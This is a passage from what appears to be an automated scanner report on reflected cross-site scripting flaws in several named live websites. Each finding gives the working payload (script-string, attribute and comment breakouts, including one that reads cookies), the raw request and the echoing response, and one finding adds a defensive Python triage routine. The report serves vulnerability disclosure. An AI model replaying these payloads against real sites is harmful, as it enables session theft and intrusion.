This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a");
} catch(err) {}</script>
...[SNIP]...

2.261. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.bisk.com
Path:   /MCIndex.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00fc"-alert(1)-"b0f823cffe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /MCIndex.asp?c00fc"-alert(1)-"b0f823cffe6=1 HTTP/1.1
Host: info.bisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:57:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 394
Content-Type: text/html
Set-Cookie: MCIDtype=external; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: MCIDCookie=9505; expires=Sat, 15-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACSQAQAR=BLGOFMPAPAGFDCNPLOKOFCMM; path=/
Cache-control: private


<html>
<head>
<meta name="GENERATOR" content="Microsoft Visual Studio 6.0">
</head>
<body>
<script language=javascript>
<!--
   var strRedir = "http://www.EducatorEducation.com/?source=196337ZX1&univ=ua&c00fc"-alert(1)-"b0f823cffe6=1";
   if(document.referrer) strRedir += "&origref=" + escape(document.referrer);
   document.location.replace(strRedir);
//-->
...[SNIP]...

2.262. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff7c"><script>alert(1)</script>f923b4feb1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?eff7c"><script>alert(1)</script>f923b4feb1b=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 16 Dec 2010 14:57:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&eff7c"><script>alert(1)</script>f923b4feb1b=1" type="text/css" media="all" />
...[SNIP]...

2.263. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jsc.madisonlogic.com
Path:   /jsc

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a8bdc<script>alert(1)</script>a598a4a7645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

The payload is echoed unmodified. Note, however, that the response is served with Content-Type application/x-javascript and the reflection lands on a // comment line of that script, so the injected <script> tag is inert when the resource is loaded as a script. Exploitability therefore depends on a browser being made to render the response as an HTML document, or on a line terminator surviving in the parameter name so that the comment ends before the payload; neither was demonstrated by this scan and both should be checked by hand.

Request

GET /jsc?a8bdc<script>alert(1)</script>a598a4a7645=1 HTTP/1.1
Host: jsc.madisonlogic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 16 Dec 2010 14:57:44 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter a8bdc<script>alert(1)</script>a598a4a7645

2.264. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69ade'-alert(1)-'2ede3737740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player69ade'-alert(1)-'2ede3737740/playlist.php HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
ealMedia/ads/';
       //OAS_url = 'http://oas-central.realmedia.com/RealMedia/ads/';
       //OAS_sitepage = window.location.hostname + window.location.pathname;
       OAS_sitepage = 'www.crainsny.com/video//player69ade'-alert(1)-'2ede3737740/playlist.php';
       OAS_listpos = 'Middle1,Bottom1';
       OAS_query = '';
       OAS_target = '_blank';
       //end of configuration
       OAS_version = 10;
       //OAS_rn = '001234567890'; OAS_rns = '1234567890';
       //OAS_
...[SNIP]...

2.265. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ea96<script>alert(1)</script>92b0d100679 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player2ea96<script>alert(1)</script>92b0d100679/playlist.php HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0200u";hbx.gn="EHG-CRAIN.HITBOX.COM";
//BEGIN EDITABLE SECTION
hbx.acct="DM53030709ZD83EN3";//ACCOUNT NUMBER(S)
hbx.mlc = '/video/';
hbx.pn='player2ea96<script>alert(1)</script>92b0d100679/playlist.php';
hbx.pndef="title";
hbx.ctdef="full";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.elf="n";
hbx.seg="";
hbx.cp="null";
hbx.cmpn="MHCMP";
hbx.gpn="MHGP";
</script>
...[SNIP]...

2.266. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96d9b<script>alert(1)</script>6e0e344090b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/playlist.php96d9b<script>alert(1)</script>6e0e344090b HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:14 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0200u";hbx.gn="EHG-CRAIN.HITBOX.COM";
//BEGIN EDITABLE SECTION
hbx.acct="DM53030709ZD83EN3";//ACCOUNT NUMBER(S)
hbx.mlc = '/video/';
hbx.pn='player/playlist.php96d9b<script>alert(1)</script>6e0e344090b';
hbx.pndef="title";
hbx.ctdef="full";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.elf="n";
hbx.seg="";
hbx.cp="null";
hbx.cmpn="MHCMP";
hbx.gpn="MHGP";
</script>
...[SNIP]...

2.267. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.crainsnewyork.com
Path:   /player/playlist.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56746'-alert(1)-'3858b0910ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/playlist.php56746'-alert(1)-'3858b0910ea HTTP/1.1
Host: media.crainsnewyork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5891553.1292505071.1.1.utmcsr=crain.com|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=c9b89455fc212a3647a1d11e3c3feabe; PBCSSESSIONID=373412229477322; OAX=rnneEk0KD/kAA2R8; __utma=5891553.1000867368.1292505071.1292505071.1292505071.1; __utmc=5891553; __qca=P0-183983675-1292505070639; __utmb=5891553.13.10.1292505071; PBCSPERMUSERID=373412229477322;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:58:13 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 9562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<title> - - </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1
...[SNIP]...
';
       //OAS_url = 'http://oas-central.realmedia.com/RealMedia/ads/';
       //OAS_sitepage = window.location.hostname + window.location.pathname;
       OAS_sitepage = 'www.crainsny.com/video//player/playlist.php56746'-alert(1)-'3858b0910ea';
       OAS_listpos = 'Middle1,Bottom1';
       OAS_query = '';
       OAS_target = '_blank';
       //end of configuration
       OAS_version = 10;
       //OAS_rn = '001234567890'; OAS_rns = '1234567890';
       //OAS_rn = new Stri
...[SNIP]...
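Every payload in these findings has the same shape: a random prefix, a context-specific probe, and a random suffix. The scanner's "Issue detail" wording (JavaScript string in double or single quotation marks, HTML tag attribute, plain text between tags, HTML comment) comes from looking at the markup immediately around the reflected markers, and its Firm versus Certain confidence comes from whether the probe came back intact. The following is an added example, not code from the report or from any of the sites it covers: a small triage routine that reproduces that classification, including the caveat for a response whose Content-Type is not HTML (issue 2.263). The sample bodies are constructed here by trimming the response snippets of issues 2.252, 2.253, 2.254, 2.263, 2.264 and 2.268.

```python
"""Reflection-context triage for the scanner's canary payloads.  Added
example, not code from the report or from any site it covers.  classify()
locates the random marker halves in a response body and names the sink by
the markup around it; SAMPLES are trimmed from the report's own snippets."""

from dataclasses import dataclass
from typing import Optional


@dataclass
class Reflection:
    context: str      # js_string_dq | js_string_sq | js_code | html_comment |
                      # html_attribute | html_text | non_html_body
    echoed: str       # what came back between the two random marker halves
    breaks_out: bool  # the character that closes this sink came back raw


def _in_script(body: str, pos: int) -> bool:
    before = body[:pos].lower()
    return before.rfind('<script') > before.rfind('</script')


def _in_comment(body: str, pos: int) -> bool:
    before = body[:pos]
    return before.rfind('<!--') > before.rfind('-->')


def _open_quote(body: str, pos: int) -> Optional[str]:
    """Quote character of the JS string literal that is open at POS, scanning
    only the current line (the sinks in the report are one-line assignments)."""
    i = body.rfind('\n', 0, pos) + 1
    quote = None
    while i < pos:
        c = body[i]
        if quote and c == '\\':
            i += 2                      # skip the escaped character
            continue
        if quote:
            if c == quote:
                quote = None
        elif c in '"\'':
            quote = c
        i += 1
    return quote


def _in_attribute(body: str, pos: int) -> bool:
    """Inside an open tag, with an odd number of '"' since its '<'."""
    lt, gt = body.rfind('<', 0, pos), body.rfind('>', 0, pos)
    return lt > gt and body[lt:pos].count('"') % 2 == 1


def classify(body: str, prefix: str, suffix: str,
             content_type: str = 'text/html') -> Optional[Reflection]:
    pos = body.find(prefix)
    if pos == -1:
        return None                     # not reflected at all
    end = body.find(suffix, pos + len(prefix))
    echoed = body[pos + len(prefix):end] if end != -1 else ''
    if not content_type.lower().startswith('text/html'):
        # Issue 2.263: the whole response is JavaScript, so an HTML tag in it
        # is inert unless the browser can be made to render it as a document.
        return Reflection('non_html_body', echoed, False)
    if _in_script(body, pos):
        q = _open_quote(body, pos)
        ctx = {'"': 'js_string_dq', "'": 'js_string_sq', None: 'js_code'}[q]
        return Reflection(ctx, echoed, q is not None and q in echoed)
    if _in_comment(body, pos):
        return Reflection('html_comment', echoed, '-->' in echoed)
    if _in_attribute(body, pos):
        return Reflection('html_attribute', echoed, '"' in echoed)
    return Reflection('html_text', echoed, '<' in echoed)


# (content-type, body, random prefix, random suffix), trimmed from the report.
SAMPLES = {
    '2.252': ('text/html', '<script type="text/javascript">\npageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHomeec156";6164df56710");\n</script>', 'ec156', '6164df56710'),
    '2.253': ('text/html', '<script type="text/javascript">\npageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc");\n</script>', '3a6b2', '28eeed432fc'),
    '2.254': ('text/html', '<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1">', '9be16', '657b62b0feb'),
    '2.263': ('application/x-javascript', '// Error: Unknown parameter a8bdc<script>alert(1)</script>a598a4a7645', 'a8bdc', 'a598a4a7645'),
    '2.264': ('text/html', "<script>\nOAS_sitepage = 'www.crainsny.com/video//player69ade'-alert(1)-'2ede3737740/playlist.php';\n</script>", '69ade', '2ede3737740'),
    '2.268': ('text/html', '<!--http://www.pcadvisor.co.uk:80/graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a-->', 'd2e34', '04bd67f681a'),
}


def triage(issue: str) -> Optional[Reflection]:
    ctype, body, prefix, suffix = SAMPLES[issue]
    return classify(body, prefix, suffix, ctype)


if __name__ == '__main__':
    for issue in SAMPLES:
        print(issue, triage(issue))
```

For 2.252 the routine reports a double-quoted JS string with breaks_out set, because the "%3b probe came back as "; with the quote intact: that is exactly the situation the report grades Firm, where string termination is proven but the scanner's follow-up probe did not produce a complete alert. The breaks_out flag is the cue to repeat the test by hand with the -alert(1)- form rather than to downgrade the finding.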

2.268. http://media.pcadvisor.co.uk/graphics/icons/digg.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.pcadvisor.co.uk
Path:   /graphics/icons/digg.ico

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d2e34--><script>alert(1)</script>04bd67f681a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a HTTP/1.1
Host: media.pcadvisor.co.uk
Proxy-Connection: keep-alive
Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774517;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/
Set-Cookie: CFTOKEN=db64a13e04e3b841-EFB0762D-24E8-5498-9BD76E8771E98767;expires=Sat, 08-Dec-2040 14:58:28 GMT;path=/
Set-Cookie: JSESSIONID=f23052365a96f7339090214d767553170523;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/graphics/icons/digg.icod2e34--><script>alert(1)</script>04bd67f681a-->
...[SNIP]...

2.269. http://media.pcadvisor.co.uk/graphics/icons/slashdot.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /graphics/icons/slashdot.ico

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9a474-->956dc082084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /graphics/icons9a474-->956dc082084/slashdot.ico HTTP/1.1
Host: media.pcadvisor.co.uk
Proxy-Connection: keep-alive
Referer: http://www.pcadvisor.co.uk/news/index.cfm?newsid=3253825&rss&69011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9de57f216aa=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25772930;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/
Set-Cookie: CFTOKEN=c8a6102a81871d2f-EFB00F9E-24E8-5498-9B0C521FA0472181;expires=Sat, 08-Dec-2040 14:58:01 GMT;path=/
Set-Cookie: JSESSIONID=3a306c5729decd0825e41d52359705d757d4;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/graphics/icons9a474-->956dc082084/slashdot.ico-->
...[SNIP]...

2.270. http://media.pcadvisor.co.uk/scripts/pca.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /scripts/pca.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 28fa5--><a>9b1dee05bf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scripts/pca.js28fa5--><a>9b1dee05bf7 HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774501;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/
Set-Cookie: CFTOKEN=b7d172a67d94fa17-EFB05C62-24E8-5498-9B711B3B55C40E86;expires=Sat, 08-Dec-2040 14:58:21 GMT;path=/
Set-Cookie: JSESSIONID=f2307d3bba30c2a08a95773143236b10356f;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/scripts/pca.js28fa5--><a>9b1dee05bf7-->
...[SNIP]...

2.271. http://media.pcadvisor.co.uk/styles/facebox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.pcadvisor.co.uk
Path:   /styles/facebox.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 4733d--><script>alert(1)</script>94a5f4d2783 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /styles/4733d--><script>alert(1)</script>94a5f4d2783 HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25772972;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/
Set-Cookie: CFTOKEN=9b0dc19f890d8baa-EFB059A0-24E8-5498-9BEEF764F31AA882;expires=Sat, 08-Dec-2040 14:58:20 GMT;path=/
Set-Cookie: JSESSIONID=3a30a9aa15a48d1555222e4a56453c2356a2;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/styles/4733d--><script>alert(1)</script>94a5f4d2783-->
...[SNIP]...

2.272. http://media.pcadvisor.co.uk/styles/pcamac.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://media.pcadvisor.co.uk
Path:   /styles/pcamac.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload de645-->16d9153269f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /styles/pcamac.cssde645-->16d9153269f HTTP/1.1
Host: media.pcadvisor.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
